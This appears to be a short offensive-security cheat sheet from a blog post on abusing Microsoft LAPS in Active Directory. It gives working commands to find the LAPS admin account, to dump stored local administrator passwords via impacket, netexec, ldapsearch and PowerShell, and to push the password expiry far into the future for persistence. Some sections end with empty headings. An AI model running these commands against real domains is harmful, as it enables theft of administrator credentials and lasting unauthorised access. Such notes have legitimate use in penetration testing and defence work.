05.06.2024 ยท dadevel

Local Administrator Password Solution assigns random passwords to the local administrator account on domain-joined devices (source). With LAPSv1 the password is stored in the ms-MCS-AdmPwd attribute on the computer object. With LAPSv2 the msLAPS-EncryptedPassword or msLAPS-Password attribute is used.

Check if the current computer has LAPSv1 installed.

dir C:\Program Files\LAPS\CSE\AdmPwd.dll

Get LAPS username from registry by reading HKLM\Software\Policies\Microsoft Services\AdmPwd\AdminAccountName.

Get LAPS username from GPO (source).

PS > Get-DomainGPO | ? { $_.DisplayName -like '*laps*' } | select DisplayName, Name, GPCFileSysPath
PS > cp \\dc01.corp.local\SysVol\corp.local\Policies\{2BE4337D-D231-4D23-A029-7B999885E659}\Machine\Registry.pol .
PS > Parse-PolFile .\Registry.pol
KeyName     : Software\Policies\Microsoft Services\AdmPwd
ValueName   : AdminAccountName
ValueType   : REG_SZ
ValueLength : 20
ValueData   : LapsAdmin

Dump all accessible LAPS passwords.

Requires PR 1673.

impacket-readlaps corp.local/jdoe:'passw0rd'
python3 ./ -debug -computer ws01 corp.local/jdoe:'passw0rd'
netexec ldap dc01.corp.local -d corp.local -u jdoe -p 'passw0rd' -M laps
ldapsearch -o ldif-wrap=no -H ldaps://dc01.corp.local -D [email protected] -w 'passw0rd' -b dc=corp,dc=local '(&(objectCategory=computer)(ms-MCS-AdmPwd=*))'
Get-ADComputer -Server dc01.corp.local -Identity ws01 -Properties ms-MCS-AdmPwd,ms-Mcs-AdmPwdExpirationTime
Get-ADObject -LdapFilter '(ms-MCS-AdmPwd=*)' -Properties ms-MCS-AdmPwd,ms-Mcs-AdmPwdExpirationTime | %{ $_.DistinguishedName, $_['ms-MCS-AdmPwd'] }

If Do not allow password expiration time longer than required by policy aka PwdExpirationProtectionEnabled is not enabled and you control a computer you can set the expiration of the LAPS password far into the future (source).

Set-DomainObject -Identity ws01 -Set @{'ms-Mcs-AdmPwdExpirationTime'='136257686710000000'} -Verbose

The timestamp can be calculated with

Other tools:

Untested tools: